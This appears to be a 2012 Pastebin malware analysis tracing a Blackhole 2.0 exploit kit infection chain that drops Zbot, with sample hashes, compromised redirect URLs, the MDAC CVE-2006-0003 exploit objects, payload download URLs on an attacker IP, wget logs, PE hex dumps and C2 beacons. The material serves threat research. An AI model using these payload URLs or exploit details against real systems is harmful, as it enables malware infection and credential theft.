Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Blackhole 2.0 w/plugin Detect
- Without shellcode, drops 2 Zbot.. blackdoor & stealer
- Mothership: 69.194.194.221
- ============
- samples:
- =============
- 5d7efa0.exe (5/52) 79c701d0ef7e369ba82d6a77e7e4b42f https://www.virustotal.com/file/32ee0f16ff2e8034ae7b21a9ada852fa5ae0535f9c99fd9a5c8635573fdc2e3c/analysis/1349111222/
- updateflashplayer.exe (1/42) 272950443ed0ed5b2b9e0346f848f412 https://www.virustotal.com/file/341adaccb6d88cde2f4cbc0ea95dc25f56948266e9ac98490991e98a6851c142/analysis/1349111482/
- index.html (2/40) 7edae162a198089f69927ebd9929652b https://www.virustotal.com/file/11b7a52ae29d3c84d8f15fc211328e5e7cc8fda33959ce314d008b54c2cb270e/analysis/1349110087/
- js.js (2/42) 373c7eab6b2d0353bcf66bd37cfcde67 https://www.virustotal.com/file/2cc16d1a740e952caa2add649e2ebeb7397ca685137b08d50b1baacec88a3ea7/analysis/1349110384/
- raising-peak_suited.php (2/42) 4ae1a158abb001237fb719375b9e5e0e https://www.virustotal.com/file/fd12197c2759a0b7d79d8da7d05f34e840d1914eebc34659d80a8c2bf22379a1/analysis/1349110549/
- ===================
- Chain of infection
- ===================
- h00p://mercantilcorma.mx/6fu4Dm5j/index.html
- h00p://cheerstuffreno.com/oZZETLq6/js.js
- h00p://free-onlinecasino.co.uk/B7BU1DC6/js.js
- h00p://jeanyipindonesia.com/DxAqbpsL/js.js
- h00p://69.194.194.221/links/raising-peak_suited.php
- plugindetect obfs: http://pastebin.com/raw.php?i=h1ETdpgs
- plugindetect deobfs: http://pastebin.com/raw.php?i=79PDEWHp
- (MDAC) CVE-2006-0003
- Object: BD96C556-65A3-11D0-983A-00C04FC29E36
- Shell.Application / msxml2.XMLh00p
- Payload: h00p://69.194.194.221/links/raising-peak_suited.php?jzcvg=343836040a&ljduq=37080537020508030636&iuwtdhw=04&nrni=ujpkpl&iwsvetyo=gmlb
- SaveToFile : .//..//5d7efa0.exe
- mimeType : "application/pdf", navPluginObj : null,
- progID : ["AcroPDF.PDF", "PDF.PdfCtrl"],
- classID : "clsid:CA8A9780-280D-11CF-A24D-444553540000",
- h00p://69.194.194.221/updateflashplayer.exe
- =====================
- LOGS
- ======================
- --01:05:06-- http://mercantilcorma.mx/6fu4Dm5j/index.html
- => `index.html'
- Resolving mercantilcorma.mx... 67.23.249.227
- Connecting to mercantilcorma.mx|67.23.249.227|:80... connected.
- HTTP request sent, awaiting response... 200 OK
- Length: 437 [text/html]
- 01:05:07 (15.38 MB/s) - `index.html' saved [437/437]
- --01:05:22-- http://cheerstuffreno.com/oZZETLq6/js.js
- => `js.js'
- Resolving cheerstuffreno.com... 50.118.59.251
- Connecting to cheerstuffreno.com|50.118.59.251|:80... connected.
- HTTP request sent, awaiting response... 200 OK
- Length: 72 [application/javascript]
- 01:05:23 (2.61 MB/s) - `js.js' saved [72/72]
- // tor looks blocked perfectly....
- // gatling IP fetch script starts....
- --01:23:34-- http://69.194.194.221/links/raising-peak_suited.php
- => `raising-peak_suited.php'
- Connecting to 69.194.194.221:80... connected.
- HTTP request sent, awaiting response... 200 OK
- Length: unspecified [text/html]
- 01:23:35 (54.79 KB/s) - `raising-peak_suited.php' saved [28905]
- (MDAC) CVE-2006-0003
- Arbitrary file download via the Microsoft Data Access Components
- BD96C556-65A3-11D0-983A-00C04FC29E36
- Shell.Application
- msxml2.XMLHTTP
- SaveToFile : .//..//5d7efa0.exe
- http://69.194.194.221/links/raising-peak_suited.php?jzcvg=343836040a&ljduq=37080537020508030636&iuwtdhw=04&nrni=ujpkpl&iwsvetyo=gmlb
- mimeType : "application/pdf", navPluginObj : null,
- progID : ["AcroPDF.PDF", "PDF.PdfCtrl"],
- classID : "clsid:CA8A9780-280D-11CF-A24D-444553540000",
- http://69.194.194.221/updateflashplayer.exe
- --01:31:53-- http://69.194.194.221/updateflashplayer.exe
- => `updateflashplayer.exe'
- Connecting to 69.194.194.221:80... connected.
- HTTP request sent, awaiting response... 200 OK
- Length: 511,488 (500K) [application/octet-stream]
- 01:31:57 (165.71 KB/s) - `updateflashplayer.exe' saved [511488/511488]
- 0000 4D 5A 50 00 03 00 00 00 00 00 0F 00 FF FF 00 00 MZP.............
- 0010 00 00 00 00 00 00 00 00 40 00 1A 00 00 00 00 00 ........@.......
- 0020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
- 0030 00 00 00 00 00 00 00 00 00 00 00 00 7C 00 00 00 ............|...
- 0040 BA 10 00 0E 1F B4 09 CD 21 B8 01 4C CD 21 90 90 ........!..L.!..
- 0050 54 68 69 73 20 70 72 6F 67 72 61 6D 20 6D 75 73 This program mus
- 0060 74 20 62 65 20 72 75 6E 20 75 6E 64 65 72 20 57 t be run under W
- 0070 69 6E 33 32 0D 0A 24 37 00 00 00 00 50 45 00 00 in32..$7....PE..
- 0080 4C 01 04 00 00 00 00 00 00 00 00 00 00 00 00 00 L...............
- 0090 E0 00 0F 01 0B 01 06 00 00 10 00 00 00 BA 07 00 ................
- --01:32:30-- http://69.194.194.221/links/raising-peak_suited.php?jzcvg=343836040a&ljduq=37080537020508030636&iuwtdhw=04&nrni=ujpkpl&iwsvetyo=gmlb
- => `raising-peak_suited.php@jzcvg=343836040a&ljduq=370805370205080306
- 36&iuwtdhw=04&nrni=ujpkpl&iwsvetyo=gmlb'
- Connecting to 69.194.194.221:80... connected.
- HTTP request sent, awaiting response... 200 OK
- Length: 117,760 (115K) [application/x-msdownload]
- 01:32:32 (102.29 KB/s) - `raising-peak_suited.php@jzcvg=343836040a&ljduq=3708053
- 7020508030636&iuwtdhw=04&nrni=ujpkpl&iwsvetyo=gmlb' saved [117760/117760]
- 0000 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 MZ..............
- 0010 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 ........@.......
- 0020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
- 0030 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 ................
- 0040 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 ........!..L.!Th
- 0050 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F is program canno
- 0060 74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20 t be run in DOS
- 0070 6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00 mode....$.......
- 0080 50 45 00 00 4C 01 07 00 17 4C 69 50 00 00 00 00 PE..L....LiP....
- 0090 00 00 00 00 E0 00 0F 03 0B 01 02 38 00 28 00 00 ...........8.(..
- POST HTTP/1.1
- 69.194.194.221 POST /forum/viewtopic.php HTTP/1.0
- 69.194.194.221 POST /forum/viewtopic.php HTTP/1.0
- 69.194.194.221 POST /forum/viewtopic.php HTTP/1.0
- ===========================
- Oct 1st, 2012
- ===========================
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement